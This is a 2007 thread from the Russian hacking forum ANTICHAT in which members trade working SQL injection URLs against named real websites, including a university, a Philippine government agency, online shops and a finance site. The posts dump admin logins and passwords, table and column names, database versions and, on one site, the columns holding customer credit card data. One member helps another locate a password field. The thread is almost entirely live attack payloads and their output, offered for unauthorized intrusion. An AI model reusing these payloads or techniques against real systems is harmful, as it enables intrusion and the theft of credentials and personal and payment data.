ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
09.12.2007, 10:33
|
|
Новичок
Регистрация: 06.12.2007
Сообщений: 11
Провел на форуме:
120052
Репутация:
30
|
|
Это мой первый пост так что не судите строго, если что то не так =)
http://www.ugkr.ru/news.asp?id=-842+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19.20,21,22,23--
http://www.ugkr.ru/news.asp?id=-842%20union%20select%201,2,table_name,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19.20,21,22,23%20from%2 0information_schema.tables%20where%20table_name%20 not%20in%20('ABITUR','BIBLIOTEKA')--
Нужная табличка USRGENERAL, а вот список столбцов в ней:
FIRSTLOGON
ID
KEYKOD
KOD_1S
NAME1
NAME2
NAME3
PASKEY
PASSWORD
USER_BIRTH
USER_GENDER
USER_INN
USER_MAIL
USER_PROXCART
USER_RIGHT
USER_SPEC
USER_STUD_STAT_PERIOD
USER_STUD_STATUS
USER_TYPE
USER_UCHGROUP
USER_UDOST
USER_UDOST_DATE
USER_UDOST_NOMER
USER_UDOST_SERIAL
Последний раз редактировалось 4Dfx; 09.12.2007 в 15:23..
|
|
|
09.12.2007, 14:22
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
http://www.denicek.altre.cz/coment.php?autors=0&id=78221+UNION+SELECT+1,2,conc at_ws(name,0x3a,username,0x3a,icq,0x3,email),4,5,6 ,7+from+users/*
не добил - поле пароля ни как не подберу ..
http://www.denicek.altre.cz/admin
|
|
|
|
09.12.2007, 14:30
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186
Репутация:
778
|
|
Сообщение от 159932
не добил - поле пароля ни как не подберу ..
pw
|
|
|
|
09.12.2007, 15:16
|
|
Новичок
Регистрация: 26.11.2007
Сообщений: 6
Провел на форуме:
84364
Репутация:
4
|
|
http://www.funisland.com/gamelist.php?id=-13+UNION+SELECT+1,password,username,4,5,6,7,8,9,10 ,11,12,13,14,15+from+admin/*
|
|
|
|
09.12.2007, 16:36
|
|
Познающий
Регистрация: 29.06.2007
Сообщений: 51
Провел на форуме:
1650734
Репутация:
14
|
|
Код:
http://www.recado.ru/index.php?id=9999+union+select+1,2,concat(user,0x3a,pass)+from+users+limit+0,1/*
Код:
http://www.shemaroo.com/online/product.asp?productid=2279'+or+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('ContestResults','Countries','Currency','DetailPoll','Download','download_logins','DownloadDetails','Film','HomeImages','Login','dtproperties','MblCon','MISDNRange','Order_Details','Order_Master','Order_DetailsIntl','Order_MasterIntl'))--&sent=1
Tables: 'ContestResults','Countries','Currency','DetailPol l','Download','download_logins','DownloadDetails', 'Film','HomeImages','Login','dtproperties','MblCon ','MISDNRange','Order_Details','Order_Master','Ord er_DetailsIntl','Order_MasterIntl
Columns из "Login":
'KeyID','LastLogDate','LoginId','PassAns','PassQue s','Password','Status'
Код:
http://musical-shop.de/details.asp?Artikelnr=10301'+or+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('Pages_MusicalShop','sysconstraints','syssegments','Bewertungen','D99_Tmp','Tab_Artikel','Tab_Artikel_BACKUP','Tab_Musicalnews','Tab_MusicalHistory','Tab_MusicalPremieren','Tab_Musicals','Tab_Musicaltickets','Tab_Playbacks','Tab_Premieren','Tab_Soundclips','Tab_Soundtracks'))--
Tables: Pages_MusicalShop','sysconstraints','syssegments', 'Bewertungen','D99_Tmp','Tab_Artikel','Tab_Artikel _BACKUP','Tab_Musicalnews','Tab_MusicalHistory','T ab_MusicalPremieren','Tab_Musicals','Tab_Musicalti ckets','Tab_Playbacks','Tab_Premieren','Tab_Soundc lips','Tab_Soundtracks','Werbebanner'
Код:
http://www.dvd-shop.ch/result.php?menuid=2'+union+select+1,21,3,table_name+from+information_schema.tables+where+table_name+not+in+('CHARACTER_SETS','COLLATIONS','COLLATION_CHARACTER_SET_APPLICABILITY','COLUMNS','COLUMN_PRIVILEGES','KEY_COLUMN_USAGE','ROUTINES','SCHEMATA','SCHEMA_PRIVILEGES','STATISTICS')/*
Код:
http://www.artrainusa.org/artwork.asp?item=(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name='Sales'%20and%20column_name%20not%20in%20('CustID','OrderID','BName','BCompany','BAddress','BCity','BState','BZip','BCountry','Name','Company','Address','City','State','Zip','Country','Phone','Email','Details','SubTotal','Tax','Shipping','ShippingType','GrandTotal','CC','CCNo','CCExp','DatePosted','isDonation','anonymous','mailinglist','contact_preference','contact_idea'))--
Tables:
'News','Calendar','Catalog','dtproperties','Featur es','Sales','sysconstraints'
Columns из 'Sales':
'CustID','OrderID','BName','BCompany','BAddress',' BCity','BState','BZip','BCountry','Name','Company' ,'Address','City','State','Zip','Country','Phone', 'Email','Details','SubTotal','Tax','Shipping','Shi ppingType','GrandTotal','CC','CCNo','CCExp','DateP osted','isDonation','anonymous','mailinglist','con tact_preference','contact_idea' |
|
|
|
09.12.2007, 20:52
|
|
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753
Репутация:
552
|
|
Код:
http://www.acte.org/resources/press_release.php?id=-91+union+select+1,2,3,concat(id,0x3a,login,0x3a,password),5,6,7,8,9+from+users/*
Код:
http://www.dswd.gov.ph/faqdetails.php?id=-47+union+select+1,concat(ID,0x3a,username,0x3a,password),3,4,5,6+from+P_admin/*
Код:
http://www.bactravel.it/centri/schede.php?id=-9+union+select+1,VERSION(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
Последний раз редактировалось SWAT; 09.12.2007 в 21:18..
|
|
|
|
10.12.2007, 01:52
|
|
Постоянный
Регистрация: 25.08.2007
Сообщений: 530
Провел на форуме:
3926698
Репутация:
1446
|
|
Первая инъекция, сильно не ругайте
Код:
http://www.malco.com/index.php?page=movie_cinema&movie_id=1993+union+select+database(),2,VERSION(),user(),5,6,7,8,9,10/*
Код:
http://www.malco.com/index.php?page=movie_cinema&movie_id=1993+union+select+1,name,3,4,5,6,7,8,9,10+from+users+where+name=admin/*
Последний раз редактировалось Momiji; 10.12.2007 в 02:00..
|
|
|
|
10.12.2007, 02:09
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641
Репутация:
205
|
|
Немного доработал, от меня такой вариант:
Код HTML:
http://www.malco.com/index.php?page=movie_cinema&movie_id=1993+union+select+concat(name,0x3a,email),2,3,4,5,6,7,8,9,10+from+users/*
|
|
|
|
10.12.2007, 02:11
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548
Репутация:
1942
|
|
убийствеенная скуля в mssql(это всё одна скуля) тут выводить не стал, т.к. то что вывел для себя- всеравно не подошло.
Код:
http://www.cerclefinance.com/default.asp?pub=valactu&localcode=&isin=&art=1+or+1=(SELECT+TOP+1+TABLE_NAME
+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('REFERENTIAL_CONSTRAINTS','ficcf13000EMAILS'
,'Portrait_Type','site','CHECK_CONSTRAINTS','CONSTRAINT_TABLE_USAGE','Pays_Calsta','cf_stat_1','CONSTRAINT_COLUMN_USAGE'
,'non_membres'','VIEWS','compteur_connexions',,)'VIEW_TABLE_USAGE','VIEW_COLUMN_USAGE','calendrier_stat','audit_lignes'
,'Sondage_Trace','dtproperties','valtop','Interview','articles','Hard-Bounces','Dossier_Lexique','exception','Interview_Futur','utilisateur'
,'emailing_tmp','cp_20070426','pays','Dossier','alerte_env','email_env','menu_profil','habilitation_journaliste','questions','articles_test'
,'newsvaleurlast','envoi','Interview_Type','avis_des_brokers','type_article','PROFIL','format','menu','Conseils','desabonne','t_jiaozhu',
'email_SNCF','articles_sauv','Dossier_Theme','ICB','popup','Economic_group','CF_ibase','accnew','tmpemail','newsvaleur','stocksname',
'nospam','aide','Dep','membres_relance','emailing_Effidata','CF_vue_nb_mails','forum2','concours','enquete','CmdShell','pop_email'
,'seuils_et_resistances','parties_payantes','DossiersTMP','calendrier_ste','concours_oct2001_questions','eco_group','cookies','Contacts_CP'
,'liens_articles','ENTREPRISE',''Interview_Bio','emailing_tmp_Himedia','essai','membres_email_faux','concours_oct2001_reponses','newshebdo'
,'mailing_cpr','images','initiation','KEY_COLUMN_USAGE','markviral','CreaFinance_Mails','morning_env','membres','CONSULTATION_ARTICLE'
,'DateXML5','nokia','membres3','articles_2003','noms','env_tmp_atos_sg','noms2','Valeur_perso','avisdesbrokers','pub','stats','non_membres
_email_faux','concours_oct2001_participants','valtopbs','habilitation','JOUR_FERIE','forum','ibase_20070122','Interview_QR','type_xml','FTP_Trace',
'groupe_menu','tmpemail2','nochronique','articles_2002','EMail_20060616','fondamentaux','emailing_tmp_ibase','invalides','ficcfp','OST','stat_membres
','secteur','Sondage_Proposition','utilisateurs_click_and_buy','Sondage','syssegments','situation','sysconstraints','sysalternates','etudes'
,'SCHEMATA','TABLES','membres_v2','TABLE_CONSTRAINTS','FauxEmails','TABLE_PRIVILEGES','COLUMNS','centre','COLUMN_DOMAIN_USAGE'
,'COLUMN_PRIVILEGES','DOMAINS','Portrait','DOMAIN_CONSTRAINTS','invalides_20071129','recommandations'))--
Последний раз редактировалось BlackCats; 10.12.2007 в 21:18..
|
|
|
|
10.12.2007, 07:33
|
|
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695
Репутация:
524
|
|
Для Mike007
Когда начнём стараться?!
Код:
http://www.dualtime.ru/page.php?n=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4/*
4.0.27:replica_db0:replica_db0@88.214.192.30
Код:
http://www.mywatches.ru/page.php?n=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4/*
5.0.45-log:u80484:u80484@10.10.223.245
Код:
http://www.atlantic-time.ru/page.php?n=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4/*
5.0.45-log:u48597:u48597@10.10.223.217 |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
